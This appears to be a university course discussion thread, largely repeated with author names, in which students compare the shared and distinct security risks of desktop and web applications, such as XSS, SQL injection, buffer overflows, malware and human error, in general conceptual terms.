A common shared risk between web and desktop applications are access control flaws. Per SANS, the main reason for access control flaws is inadequate input validation. For example, both desktop and web apps that fail to validate data entry could experience issues should a user input malicious code or unsupported characters into the app’s fields. This could cause the application to crash which could be used as an entry point for an attacker.
A risk specific to web applications, and not desktop applications, is cross site scripting. Cross-site scripting occurs when an adversary injects malicious code into a web application. For example, cross-site scripting can be used to modify urls so that when a user clicks their information is redirected to the attacker. This can be used to capture session cookies which would allow the attacker to hijack the session.
These types of risks are especially dangerous because, like you point out, they could be used as an entry point for an attacker to gain privileged access with the right skill set; exploiting a buffer overflow could lead to a threat actor launching system commands to hijack a process ran by an administrator user, and then damage can exponentiate from there based on network segmentation in effect which could prevent against pivoting.
Hello Antonio,
I totally agree with you that you are on point as regards the categorization of risks in your analysis but you need to appreciate that because of the proliferation of Web-based apps, vulnerabilities are the new attack vector. An attack of a Web-based application may yield information that should not be available, browser spying, identify theft, theft of service or content, damage to corporate image or the application itself and the dreaded Denial of Service.
Hello Mathew, Very well said.
If I may add, Cross-Site scripting enables an attacker to execute malicious scripts in another user’s web browser. However, instead of attacking the victim directly, the attacker exploits a vulnerability in a website the victim visits and indirectly gets the website to deliver the malicious script.
Different between Web applications and desktop applications:
Desktop applications have traditionally been limited by the hardware on which they run. They must be developed and installed for a specific operating system and may have strict hardware requirements that must meet to ensure they function correctly. This hardware dependency and the legacy of mainframe terminal applications often limit the complexity of the user interface of desktop applications. Web applications are more reminiscent of the original mainframe applications or the later client-server model common to early desktop business applications. Users use a Web browser (effectively a client-side replacement) to access the application and use the resources available on the Internet, including storage and CPU processing power.
Desktop applications are computer programs that do not require an Internet connection to work, and web applications do not require any installation and can run on your web browser.
It is also interesting to see how much an organization would have flexibility problems on applications desktop vs. web. As you mentioned, desktop applications limit you to access the system via your local device and you ares strong as your device is. However, for the web applications, all you need to have is good web connection which gives you the flexibility of accessing from anywhere you want regardless the device ability.
I agree with you that desktop applications are traditionally limited by the hardware they run on. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Web applications require instant networking, which leads to a higher level of risk than desktop applications.
Zijian,
Although web applications are located on a remote server, users can access the web applications from any device. We use web applications day to day such as Google Docs, messengers, and email services. A question we have to ask ourselves is, how do we know that the vendor has proper security protocols in place?
You ask a great question! Everyone can be penetrated – look at Solar Winds and how that exploit was leveraged. It is very difficult to truly know who to trust……
You make a good point about desktop applications being limited by the hardware on which they run. This, in combination with cheaper internet costs and a, for the most part, always connected world seem to be some of the driving factors for web-based applications to replace desktop applications entirely, Why develop an application specifically locked into one type of operating system, when you can just as easily make it cross-platform? Seems expensive & time consuming, in my opinion.
Hello Zijian,
I agree with you that web applications do not need to be installed on the computer because they can run on the browser. However, I would have to disagree with the statement that desktop applications are computer programs that do not require any Internet connection to work.” My reason is that the internet powers the device and not the desktop application. In the absence of the internet, the device is offline, making the desktop application inoperable.
Desktop applications require user to install the application to local devices where you can simply run your web-based application on browser. Therefore, the first risk related to web-based applications are if something wrong happens with your Internet connection, you lose access. However, desktop applications also limits your flexibility, because you have to use the local device only to access the application. When you deal with web applications, you don’t need to worry about system requirements or update hassle. Web applications are most cost effective but you can’t secure them as much as you could desktop applications.
SANS also explains that firewalls are providing security to organizations’ applications but there is a higher risk that company deals with. Therefore, in-depth defense strategy is offered by the reading. If the application connects to internet, there are “new attacks and vulnerabilities are being reported on almost daily basis”. Access control, buffer overflows, SQL injection, XSS injection, format strings, command injection, race conditions are some of the risk factors for the web applications.
On the other side, for the desktop applications, permission and files such as logs, security data files, binaries and cgi files should be evaluated to analyze the risk. File interrogation part of the reading explains well that organization: “setuid and setgid files on your system are potential security risk, and should be monitored closely. “.
I like your proactive approach for monitoring desktop applications via setuid and setgid for malicious activity. This is an area I like to use to form my threat hunting hypotheses for potential known bad in a client’s environment. Applications unnecessarily modifying permissions or scheduling processes can be an indicator of malware. Nice post.
Miray,
I agree desktop applications should be evaluated to analyze risks. For instance, a risk within a desktop application could be an improper authorization such as the least privilege approach. So many administrators who have this level of access take advantage.. This can be a risk because you can gain access of a critical database or system exclusively..
Both desktop and web-based applications are vulnerable to injection-based attacks for instance rootkit and boot kits for desktop apps, and SQL injections for web apps. What makes each type of application unique is the underlying frameworks which present their own risks i.e., scale of impact and code-specific vulnerabilities. Web-based apps have the potential to impact a large scope of users based upon one attack, whereas desktops app attacks can be a more isolated incident targeting a single domain or user.
Kelly,
SQL injections is very serious as a risk. If a SQL injection attack was successful, it can result in confidential data being deleted, lost or stolen. However, other desktop application risks include insufficient logging & monitoring, components with known vulnerabilities (outdated software), poor code quality, and improper cryptography (weak keys).
Basically, desktop applications installed on single computer (laptop or desktop) to perform specific task, web applications usually develop client-server architecture and use via web browser on client computers, cause of that reason Web applications widely getting popular. Desktop and web applications are popular as per the situation and network requirement, both applications have following common and different risks.
Both applications face so many common type of risk such as input validation, it allow attacker to inject malicious code into input filed, application can be crash or give one of entry point for the attacker.
Generally, web applications are face cross side scripting attack (XSS) risk, but desktop application not cause of XSS launch by modifying web urls and desktop application secure from them it accessible from the local system only.
Web application required internet connectivity so it faces more risk from the all over the internet, desktop application use on local system face limited risk.
Desktop applications have a total control from a single computer web application open through large number of computers, locations and users. Web base application is accessible from the remote locations so many risk are generated when data travel through cable, switch routers to reach client to server, it face sniffing, hijacking, MITM attacks but desktop applications are protected from this risks.
Hi Mohammed, I do agree that desktop applications do have total control as opposed to a web application being accessible from remote locations and this does pose more of a risk given that packet sniffing can occur since there is more room for human error when not accessing from a personal computer.
Great points. As you said both applications face many types of risk, but it does seem web applications are more vulnerable with the number of scripting attacks and injections that can be performed. Localized applications face a number of attacks as well but to me, they are more difficult to conduct.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Some common and shared risks that web based applications and desktop applications face are commonly any bugs that could affect the performance of the application and or security. Another example that they face is any malicious software that can run on the backend when using a web application or a desktop application. The only difference is that desktop applications utilize the computers resources in terms of data storage on its hardware instead of an internet connection like a web based application. This may be a better and more secure approach as a web based applications has more chances of coming across or being targeted because it is on a network that a hacker can breakthrough where as a desktop application can run without an internet connection it only needs the computer itself.
You are definitely right with “malicious software that can run on the backend when using both applications”. To me, a common/shared risk will be human error. If for example, a phase was neglected or mistaken then it will have a huge impact on the system. Great point!
Good point. Web apps are opening themselves up to internet-based attacks, and could be more vulnerable to brute force attacks, DDoS, and SQL injections.
There are a number of risks associated with web applications such as buffer overflows and SQL injections. Whereas with desktop application viruses and malware are the most common, that’s not to say they don’t exist with web applications, but they are more common in desktop applications. Other desktop application security risks include poor logging and monitoring, OS command injections, and hardcoded data values. Authentication seems to be the most common risk between the two. Poorly implemented session management systems can allow for threat actors to take over accounts.
I like how highlighted that different types of code injections affect web applications and desktop applications in different ways (eg. SQL vs OS-based). It is also important that you mentioned authentication vulnerabilities, because broken access control vulnerabilities have become the most common vector of cyber attack, and I believe this would fall under the category of authentication vulnerabilities.
Common risks desktop applications are malware, viruses, worms, etc., and web-based applications risks are injection attacks, broken access control, authentication, and security misconfiguration. Although the web application is more recent than the desktop app, they’re no less important. Web apps are accessible from any device, anywhere, at any time, and are exposed to more security risks than desktop apps, and require more security needs, for example, internet access, users who are not identifiable, and cyber-attacks.
Segmenting your network is also a good way for secure coding to avoid all those issues. Humans are the one behind the malware or viruses through misconfiguration like you mentioned in your comment so going through a checklist is time consuming but a good way to make sure you did not miss anything.
A shared risk between web applications and desktop applications is a buffer overflow attack. This is when an application does not perform adequate size checking on the input data, therefore leading to memory space being overwritten. A risk that is unique to a web-based application is an XML injection attack. This is because this attack is carried out through the XML of a web service. A risk that is unique to desktop applications is malware, due to the applications being installed locally. It leaves the user susceptible for malicious code to be run and installed on their system.
Good examples for risks for both web-based and desktop applications. In addition to the security concern, there’s also an availability concern. Web apps also have more points of failure in terms of service speed considering they’re reliant on the server speed and internet connection. Whereas desktop apps just rely on your local hardware.
The common risks faced by desktop applications versus web-based applications are human error. SANS talks about improper application design can cause access control issues. He also mentioned inadequate input validation. All those are related to human error and if one phase was neglected during the application process/development, then this can give access to unauthorized users. For example, SANS talked about the vulnerability of SQL injection in which the attacker is able to modify, delete, or insert data. This is due to improper data validation. Another common risk can be malicious software or user input malicious code.
The difference between a web and a desktop application is that desktop apps are computer programs that do not need an internet connection to be used while a web application needs an internet connection if you want to use it. Web applications are accessible over the Web and HTTP protocol so they present more security challenges than desktop applications. Incorrectly misconfiguring a web application bring malicious attacks or provide bad actors with an easy way to exploit sensitive information like SANS referred to SQL injection.
Hi Ornella. Human error seems to always be a given when it comes to risks whether it be desktop and/or web-based applications. I like the example you brought up from SANS in regards to injection attack where the attacker had access to change data. It is unfortunate that human error continues to be an issue in security data breaches. Even though it is something that we cannot fully avoid, proper steps should always be taken in order to minimize the effect the next time that it occurs.
What are the common/shared risks and what are the different/unique risks faced by desktop applications vs web-based applications?
A web application is a software stored on a remote server and run on a web browser. A desktop application is a stand alone software that is installed on a computer. There are a number of risks that could occur on both a web-based application and desktop application. Easy access can be gained between a desktop and web applications. Users can access web applications from any device. Desktop application security risk could be insecure communication or an improper authorization such as a least privilege approach. Web applications such as injection flaws, broken authentication, SQL injection, security misconfiguration are risks.
However, organizations’ applications are at a higher risk although firewalls are providing security, according to SAN.
I like your post and I would like to add that people are relying so much on firewalls providing security. However, they don’t put too much emphasis on how to properly secure their system. Firewalls are great but all means of security to avoid breaches are better. For that you should train you users on the do’s and don’t of the company. Segment your network, physical security is also necessary to block unauthorized people from accessing your building or data server. Great post!
Web applications have a slight advantage over desktop applications, but desktop applications are very unlikely to become obsolete. web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Updating an application takes a lot of time and effort for desktop applications because it needs to be done on each computer, but web-based applications save time and effort. Web applications face more security risks than desktop applications, and they are open to a large number of users in the Internet community, which expands the threat.Web application development and its maintenance involve higher costs; desktop applications are one-time purchases that do not incur continuous costs. Lack of funding for maintenance can easily prevent teams from following up and maintaining the system in a timely manner, thus creating a new risk.
Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes. One thing all business owners will have to acknowledge and guard themselves against would be the presence of software vulnerabilities and threats to web applications
A web application is primarily a software being kept on a remote server and run on a web browser. A desktop application is simply a stand alone software that is being installed on a computer. There are several risks that could happen on both a web-based application and desktop application. Easy access can be obtained between a desktop and web applications. Users can therefore access web applications from any device at all. As matter of fact, desktop application security risk could not have a strong communication or an improper authorization such as a least privilege approach. Web applications such as injection flaws, broken authentication, SQL injection, security misconfiguration are risk. organizations’ applications are deemed to be at a higher risk though firewalls are providing security,
It is true that web applications can be more difficult to manage due to the larger attack surface. And you are certainly correct that the easy access makes web applications potentially more enticing for company’s to develop. The decision needs to be made whether the ubiquity is worth the increased security risk.
Hello Kofi, I agree with your position that “Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes.” Access to the internet only creates more vulnerabilities to be compromised by Adversaries on the web. However, the onus is on the process owners to ensure that adequate controls are in place to mitigate any attacks that may arise from internet-related activities. Weel said.
Both web-based and desktop applications are susceptible to traditional attacks through access control; and injection attacks if neither program has input validation allowing hackers to exploit syntax errors from either program. Where the two differentiate from each other is convenience and the scope of the security varies between vendors. Web-applications also introduce more exploits such as Buffer Overflow, XML Injection, and SQL injection attacks. And although web-based applications are cross-platform and provide a very easy and convenient way for the end user to access the application – it should be noted that platform security is dependent on the vendor that manages the application. Technically, desktop applications can come with similar risks depending on the scope of the system. Since developers sometimes utilize embedded SQL servers within desktop applications depending on the system, but many desktop applications do not require an internet connection which means access is local rather than over the web.
Web-based applications are programs you access online delivered to your device from a remote server when you access it via a browser; it is not installed on your machine. On the other hand, Desktop applications are the programs that you download and install on your device. They do not need internet connectivity to be used. Every required functionality is stored on the workstation with little no reference to the internet except for connectivity. So, the application can be accessed through your desktop.
The common risk they both face is XSS(Cross-Site Scripting) and other malicious attacks that may compromise access to the application.
Web-based applications are the more modern method of delivering applications, while Desktop applications are more traditional.
Web applications are at higher security risks as they are inherently designed to increase accessibility. On the other hand, desktop applications have the better authorization, and administrators have better control, hence more secure. In addition, web applications rely heavily on internet connectivity for their operation, while desktop applications rely solely on user access.
Everything on the internet is more vulnerable to hackers than information left on a device, i.e., cloud storage, for example, is deployed either in the form of SAAS, IAAS or PAAS by the Cloud Service Provider(CSP) without client input. In contrast, desktop storage is solely reliant on the capability of the Data Owner and not the service provider.
• What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Cross-site scripting and SQL injection attacks are common risks in both desktop and web based apps. The 2 applications differ in their construct (browser based vs executing 100% on your local compute platform), but share the vulnerabilities of connecting to and querying back end systems.
The different vulnerabilities come from the different locations where functions are executed in desktop vs web based. The desktop apps are also vulnerable to a host of attacks that can be launched from the local compute platform. Web based apps then to be browser based and are more vulnerable to web server based attacks.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
The most obvious shared risk between desktop and web-based applications is that of access control flaws. Although it is a more general issue with different implications based on the type of access flaw, it is prevalent and poses a significant risk in both type of applications on a large scale. SQL Injection and XSS are primary risks that even make it to the OWASP top 10 list of common web app vulnerabilities. On the other hand, desktop applications are quite susceptible to process hijacking and then privilege escalation or pivoting.
Thanks for sharing, the OWASP list is a good piece of information. SQL is definitely a serious risk for the web based apps.
Do you happen to have any examples of a desktop application being hijacked?
Desktop and web based applications are subject to both authentication and access control risks since both need to configured to ensure only appropriate users maintain access to the application and each can only perform functions they are required to perform. Some of the more common desktop application risks include malware/viruses, which can be developed take advantage of a flaw in the design/configuration of the application can be propagated across other clients in the network. Web based applications are typically more vulnerable to remote attacks, such as cross site scripting (XXS) and SQL injection.
Hello Bryan,
That’s a good explanation of the difference between the web and desktop application. I do agree that the web application are vulnerable to cross site scripting (XXS) and SQL injection. However, the malware and virus are also a risk to the web application as well along with the desktop application.
Hi Bryan. Great analysis! I would also argue that SQL injections could impact on-prem applications if the SQL database connects with any web server based databases (same with XML attacks).
The common risk that both desktop applications and web-based applications has is maintaining the application itself. If the application is not patch on time, then it would be vulnerable to the vulnerability that the current version might have. The risk that desktop applications has is they are limited by the hardware resources. If the resource of the application is installed is not meeting the performance level which is accepted by the business, then they might be required to be replaced. Another risk with the desktop application is it require to get installed to the desktop by the user. If the application is installed by the user has malware in it then it could introduce the risk within the companies’ network. The risk with the web-based application is that the user has to have a good internet connection. They also need to be properly configured as it could be accessible by anyone on internet.
Fanstatic post, you did a far better job than me explaining the ease in which an attacker can execute a web-based attack by simply having an internet connection. I agree that desktop apps require an additional level of privilege esc inorder to cause considerable damage.
Both desktop applications and web based applications are vulnerable to many application-based risks. Web based applications are highly privy to buffer overflow attacks, which can lead into DDOS (distributed denial of service) attacks or even malware injections. Due to the on-prem nature of desktop applications (ie calculator), this attack can generally be avoided; but when a desktop application connects with web-based servers, the possibility for a buffer overflow attack is resurfaced. SQL injections can impact both desktop and web based applications; the internet is not always required to use MySQL (or other SQL programs for example), so an attacker can commit a SQL injection on either type of application. A unique risk experienced by web based applications, however, is XML injection attacks. XML is the exclusive metalanguage used by the internet and is the backbone of web servers. If an XML injection attack were to be successful, this can compromise an entire web based application or even web based database—this would not have the same impacts on a desktop server though.
I actually didn’t think about that about XML when I was making my comment. I wish I actually stated that instead of my other points I made. Anyhow; I like that you pointed out that SQL is sometimes used by desktop applications. I know a lot of developers will embed SQL into the applications to function as servers for a LAN.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Both desktop applications and web based applications have the challenge of being maintained, the risk of unwanted access and security risks.
Some differences are:
Web Based- No need to install, not user dependent for updates, Easy access, can be accessed from mobile device, more security risks due to internet exposure,
Application Based- Does not rely on the internet, stronger privacy and data protection due to not being internet dependent, more hardware dependent as it is needs computer resources to run but usually runs faster than web based because of this, unable to be accessed from as many devices as web based
Desktop application cons
* Desktop apps may be harder to scale when compared to cloud-based alternatives
* There is a lack of communication between computers. Changes you made locally may not reflect on another user’s machine. Meaning collaboration is also more difficult on desktop apps. Users may share files via email or USB, creating a potential security vulnerability.
Web app cons
* You must be connected to the internet, leaving you vulnerable to internet-based attacks. Whereas with desktop apps, you have the opportunity to air gap
* Availability is limited to the service availability. For example, if AWS has an outage, there’s not much you personally can do to get it back up and running
* There are more potential points of failure. Desktop apps only rely on your computer speed, whereas web apps can be affected by server speed and internet speed.
* For desktop apps, you have the opportunity to pursue your own backup solution. However, with web apps you may be forced to use a certain backup solution that’s compatible or supported by that web app.
* For desktop apps, there is no question of ownership. The person on that local computer made that change in the app. However, web app data is not stored locally, but sent to a cloud, so there may be a question of ownership regarding changes or updates to the data.
* Web apps may have an automatic update system in place, which could potentially break compatibility or functionality.
Risks for both
* Security updates are a concern, since not all applications will be supported indefinitely; most applications will hit end of life.
Desktop applications & web-based applications have several shared risks, such as poor authentication measures and weak passwords. Regardless of how the application is accessed, weak passwords can be broken if the data is highly desired, and so back-up measures such as two-factor authentication should always be in place. A unique risk that desktop applications face is their high vulnerability to malware invading the system the application is installed on. If a person downloads an untrustworthy application, they may be allowing something onto their computer that can quickly spread across the system & network. Another risk is the application being locked onto a particular device. For example, if you leave work for the day and forget to lock your computer, you are openly leaving all of the information on a specific desktop application open to whoever. On the other hand, web-based applications have their own unique risks, such as SQL Injection & Cross-site scripting. SQL Injection works when an attacker includes SQL query into an input channel on an application that the user then accesses. Once the malicious SQL query is validated, the attacker is able to access/manipulate database information, such as sensitive company data. Cross-site scripting (XSS) works by exploiting an application with a client-side text string containing malicious JavaScript to a user’s browser, which can have several consequences such as redirecting the user to a malicious website or stealing sensitive cookie information.
People are the shared risk that both desktop apps and web apps have in common. Because of people, web apps and desktop apps are at risk due being connected to the internet. Authentication, authorization, exposure of sensitive data and injections are all risks that come with being connected to the internet. Web applications are more at risk than desktop apps in today’s world. Web applications face risks such as login/password theft, security misconfiguration and cross site scripting. Desktops do have risks such as virus’s and malware but are less risky because they do not require the internet to run.
I hadn’t considered human risk even though we have discussed various ways humans introduce IT security risk across several units. It’s a great point and I think with the existence and popularity of cloud based services humans are much more vulnerable to web application rather than desktop application risks.
Desktop application is a type of software that you install directly on your personal computer. You can launch it whenever you want independently of other applications. They take up space of your hard drive and can work regardless of internet connection. Although some apps need it to function as intended (web browsers like Chrome or Firefox, for example) they are still considered desktop apps since they are installed on your PC whereas web-based application is a type of software application is used through the internet via a web browser. Instead of storing the files on your computer, they are located on a remote server. A web browser allows you to access the app and its content and also runs all the scripts responsible for its features. What differentiates a simple static web page from the web application is interactivity. They often allow you to create, edit, or manipulate data and content.
Matthew Bryan says
A common shared risk between web and desktop applications are access control flaws. Per SANS, the main reason for access control flaws is inadequate input validation. For example, both desktop and web apps that fail to validate data entry could experience issues should a user input malicious code or unsupported characters into the app’s fields. This could cause the application to crash which could be used as an entry point for an attacker.
A risk specific to web applications, and not desktop applications, is cross site scripting. Cross-site scripting occurs when an adversary injects malicious code into a web application. For example, cross-site scripting can be used to modify urls so that when a user clicks their information is redirected to the attacker. This can be used to capture session cookies which would allow the attacker to hijack the session.
Antonio Cozza says
These types of risks are especially dangerous because, like you point out, they could be used as an entry point for an attacker to gain privileged access with the right skill set; exploiting a buffer overflow could lead to a threat actor launching system commands to hijack a process ran by an administrator user, and then damage can exponentiate from there based on network segmentation in effect which could prevent against pivoting.
kofi bonsu says
Hello Antonio,
I totally agree with you that you are on point as regards the categorization of risks in your analysis but you need to appreciate that because of the proliferation of Web-based apps, vulnerabilities are the new attack vector. An attack of a Web-based application may yield information that should not be available, browser spying, identify theft, theft of service or content, damage to corporate image or the application itself and the dreaded Denial of Service.
Olayinka Lucas says
Hello Mathew, Very well said.
If I may add, Cross-Site scripting enables an attacker to execute malicious scripts in another user’s web browser. However, instead of attacking the victim directly, the attacker exploits a vulnerability in a website the victim visits and indirectly gets the website to deliver the malicious script.
zijian ou says
Different between Web applications and desktop applications:
Desktop applications have traditionally been limited by the hardware on which they run. They must be developed and installed for a specific operating system and may have strict hardware requirements that must meet to ensure they function correctly. This hardware dependency and the legacy of mainframe terminal applications often limit the complexity of the user interface of desktop applications. Web applications are more reminiscent of the original mainframe applications or the later client-server model common to early desktop business applications. Users use a Web browser (effectively a client-side replacement) to access the application and use the resources available on the Internet, including storage and CPU processing power.
Desktop applications are computer programs that do not require an Internet connection to work, and web applications do not require any installation and can run on your web browser.
Miray Bolukbasi says
Hi Zijian,
It is also interesting to see how much an organization would have flexibility problems on applications desktop vs. web. As you mentioned, desktop applications limit you to access the system via your local device and you ares strong as your device is. However, for the web applications, all you need to have is good web connection which gives you the flexibility of accessing from anywhere you want regardless the device ability.
Dan Xu says
Hi zijian,
I agree with you that desktop applications are traditionally limited by the hardware they run on. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Web applications require instant networking, which leads to a higher level of risk than desktop applications.
Victoria Zak says
Zijian,
Although web applications are located on a remote server, users can access the web applications from any device. We use web applications day to day such as Google Docs, messengers, and email services. A question we have to ask ourselves is, how do we know that the vendor has proper security protocols in place?
Richard Hertz says
You ask a great question! Everyone can be penetrated – look at Solar Winds and how that exploit was leveraged. It is very difficult to truly know who to trust……
zijian ou says
I like your question. Nowadays, many people question whether the network devices and software we use in our lives are secure and confidential or not.
Alexander William Knoll says
Zijan,
You make a good point about desktop applications being limited by the hardware on which they run. This, in combination with cheaper internet costs and a, for the most part, always connected world seem to be some of the driving factors for web-based applications to replace desktop applications entirely, Why develop an application specifically locked into one type of operating system, when you can just as easily make it cross-platform? Seems expensive & time consuming, in my opinion.
Olayinka Lucas says
Hello Zijian,
I agree with you that web applications do not need to be installed on the computer because they can run on the browser. However, I would have to disagree with the statement that desktop applications are computer programs that do not require any Internet connection to work.” My reason is that the internet powers the device and not the desktop application. In the absence of the internet, the device is offline, making the desktop application inoperable.
Miray Bolukbasi says
Desktop applications require user to install the application to local devices where you can simply run your web-based application on browser. Therefore, the first risk related to web-based applications are if something wrong happens with your Internet connection, you lose access. However, desktop applications also limits your flexibility, because you have to use the local device only to access the application. When you deal with web applications, you don’t need to worry about system requirements or update hassle. Web applications are most cost effective but you can’t secure them as much as you could desktop applications.
SANS also explains that firewalls are providing security to organizations’ applications but there is a higher risk that company deals with. Therefore, in-depth defense strategy is offered by the reading. If the application connects to internet, there are “new attacks and vulnerabilities are being reported on almost daily basis”. Access control, buffer overflows, SQL injection, XSS injection, format strings, command injection, race conditions are some of the risk factors for the web applications.
On the other side, for the desktop applications, permission and files such as logs, security data files, binaries and cgi files should be evaluated to analyze the risk. File interrogation part of the reading explains well that organization: “setuid and setgid files on your system are potential security risk, and should be monitored closely. “.
Kelly Sharadin says
Hi Miray,
I like your proactive approach for monitoring desktop applications via setuid and setgid for malicious activity. This is an area I like to use to form my threat hunting hypotheses for potential known bad in a client’s environment. Applications unnecessarily modifying permissions or scheduling processes can be an indicator of malware. Nice post.
Kelly
Victoria Zak says
Miray,
I agree desktop applications should be evaluated to analyze risks. For instance, a risk within a desktop application could be an improper authorization such as the least privilege approach. So many administrators who have this level of access take advantage.. This can be a risk because you can gain access of a critical database or system exclusively..
Kelly Sharadin says
Both desktop and web-based applications are vulnerable to injection-based attacks for instance rootkit and boot kits for desktop apps, and SQL injections for web apps. What makes each type of application unique is the underlying frameworks which present their own risks i.e., scale of impact and code-specific vulnerabilities. Web-based apps have the potential to impact a large scope of users based upon one attack, whereas desktops app attacks can be a more isolated incident targeting a single domain or user.
Victoria Zak says
Kelly,
SQL injections is very serious as a risk. If a SQL injection attack was successful, it can result in confidential data being deleted, lost or stolen. However, other desktop application risks include insufficient logging & monitoring, components with known vulnerabilities (outdated software), poor code quality, and improper cryptography (weak keys).
Mohammed Syed says
Basically, desktop applications installed on single computer (laptop or desktop) to perform specific task, web applications usually develop client-server architecture and use via web browser on client computers, cause of that reason Web applications widely getting popular. Desktop and web applications are popular as per the situation and network requirement, both applications have following common and different risks.
Both applications face so many common type of risk such as input validation, it allow attacker to inject malicious code into input filed, application can be crash or give one of entry point for the attacker.
Generally, web applications are face cross side scripting attack (XSS) risk, but desktop application not cause of XSS launch by modifying web urls and desktop application secure from them it accessible from the local system only.
Web application required internet connectivity so it faces more risk from the all over the internet, desktop application use on local system face limited risk.
Desktop applications have a total control from a single computer web application open through large number of computers, locations and users. Web base application is accessible from the remote locations so many risk are generated when data travel through cable, switch routers to reach client to server, it face sniffing, hijacking, MITM attacks but desktop applications are protected from this risks.
Wilmer Monsalve says
Hi Mohammed, I do agree that desktop applications do have total control as opposed to a web application being accessible from remote locations and this does pose more of a risk given that packet sniffing can occur since there is more room for human error when not accessing from a personal computer.
Dhaval Patel says
Hi Mohammed,
Great points. As you said both applications face many types of risk, but it does seem web applications are more vulnerable with the number of scripting attacks and injections that can be performed. Localized applications face a number of attacks as well but to me, they are more difficult to conduct.
Wilmer Monsalve says
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Some common and shared risks that web based applications and desktop applications face are commonly any bugs that could affect the performance of the application and or security. Another example that they face is any malicious software that can run on the backend when using a web application or a desktop application. The only difference is that desktop applications utilize the computers resources in terms of data storage on its hardware instead of an internet connection like a web based application. This may be a better and more secure approach as a web based applications has more chances of coming across or being targeted because it is on a network that a hacker can breakthrough where as a desktop application can run without an internet connection it only needs the computer itself.
Jason Burwell says
Hello Wilmer,
Good point about the web based applications being targeted more due to being on the network
Ornella Rhyne says
Hi Wilmer,
You are definitely right with “malicious software that can run on the backend when using both applications”. To me, a common/shared risk will be human error. If for example, a phase was neglected or mistaken then it will have a huge impact on the system. Great point!
Madalyn Stiverson says
Hi Wilmer,
Good point. Web apps are opening themselves up to internet-based attacks, and could be more vulnerable to brute force attacks, DDoS, and SQL injections.
Dhaval Patel says
There are a number of risks associated with web applications such as buffer overflows and SQL injections. Whereas with desktop application viruses and malware are the most common, that’s not to say they don’t exist with web applications, but they are more common in desktop applications. Other desktop application security risks include poor logging and monitoring, OS command injections, and hardcoded data values. Authentication seems to be the most common risk between the two. Poorly implemented session management systems can allow for threat actors to take over accounts.
Michael Jordan says
Dhaval,
I like how highlighted that different types of code injections affect web applications and desktop applications in different ways (eg. SQL vs OS-based). It is also important that you mentioned authentication vulnerabilities, because broken access control vulnerabilities have become the most common vector of cyber attack, and I believe this would fall under the category of authentication vulnerabilities.
-Mike
Christopher Clayton says
Common risks desktop applications are malware, viruses, worms, etc., and web-based applications risks are injection attacks, broken access control, authentication, and security misconfiguration. Although the web application is more recent than the desktop app, they’re no less important. Web apps are accessible from any device, anywhere, at any time, and are exposed to more security risks than desktop apps, and require more security needs, for example, internet access, users who are not identifiable, and cyber-attacks.
Ornella Rhyne says
Hi Christopher,
Segmenting your network is also a good way for secure coding to avoid all those issues. Humans are the one behind the malware or viruses through misconfiguration like you mentioned in your comment so going through a checklist is time consuming but a good way to make sure you did not miss anything.
Ryan Trapp says
A shared risk between web applications and desktop applications is a buffer overflow attack. This is when an application does not perform adequate size checking on the input data, therefore leading to memory space being overwritten. A risk that is unique to a web-based application is an XML injection attack. This is because this attack is carried out through the XML of a web service. A risk that is unique to desktop applications is malware, due to the applications being installed locally. It leaves the user susceptible for malicious code to be run and installed on their system.
Madalyn Stiverson says
Hi Ryan,
Good examples for risks for both web-based and desktop applications. In addition to the security concern, there’s also an availability concern. Web apps also have more points of failure in terms of service speed considering they’re reliant on the server speed and internet connection. Whereas desktop apps just rely on your local hardware.
Ornella Rhyne says
The common risks faced by desktop applications versus web-based applications are human error. SANS talks about improper application design can cause access control issues. He also mentioned inadequate input validation. All those are related to human error and if one phase was neglected during the application process/development, then this can give access to unauthorized users. For example, SANS talked about the vulnerability of SQL injection in which the attacker is able to modify, delete, or insert data. This is due to improper data validation. Another common risk can be malicious software or user input malicious code.
The difference between a web and a desktop application is that desktop apps are computer programs that do not need an internet connection to be used while a web application needs an internet connection if you want to use it. Web applications are accessible over the Web and HTTP protocol so they present more security challenges than desktop applications. Incorrectly misconfiguring a web application bring malicious attacks or provide bad actors with an easy way to exploit sensitive information like SANS referred to SQL injection.
Christopher Clayton says
Hi Ornella. Human error seems to always be a given when it comes to risks whether it be desktop and/or web-based applications. I like the example you brought up from SANS in regards to injection attack where the attacker had access to change data. It is unfortunate that human error continues to be an issue in security data breaches. Even though it is something that we cannot fully avoid, proper steps should always be taken in order to minimize the effect the next time that it occurs.
Victoria Zak says
What are the common/shared risks and what are the different/unique risks faced by desktop applications vs web-based applications?
A web application is a software stored on a remote server and run on a web browser. A desktop application is a stand alone software that is installed on a computer. There are a number of risks that could occur on both a web-based application and desktop application. Easy access can be gained between a desktop and web applications. Users can access web applications from any device. Desktop application security risk could be insecure communication or an improper authorization such as a least privilege approach. Web applications such as injection flaws, broken authentication, SQL injection, security misconfiguration are risks.
However, organizations’ applications are at a higher risk although firewalls are providing security, according to SAN.
Ornella Rhyne says
Hi Victoria,
I like your post and I would like to add that people are relying so much on firewalls providing security. However, they don’t put too much emphasis on how to properly secure their system. Firewalls are great but all means of security to avoid breaches are better. For that you should train you users on the do’s and don’t of the company. Segment your network, physical security is also necessary to block unauthorized people from accessing your building or data server. Great post!
Dan Xu says
Web applications have a slight advantage over desktop applications, but desktop applications are very unlikely to become obsolete. web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Updating an application takes a lot of time and effort for desktop applications because it needs to be done on each computer, but web-based applications save time and effort. Web applications face more security risks than desktop applications, and they are open to a large number of users in the Internet community, which expands the threat.Web application development and its maintenance involve higher costs; desktop applications are one-time purchases that do not incur continuous costs. Lack of funding for maintenance can easily prevent teams from following up and maintaining the system in a timely manner, thus creating a new risk.
kofi bonsu says
Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes. One thing all business owners will have to acknowledge and guard themselves against would be the presence of software vulnerabilities and threats to web applications
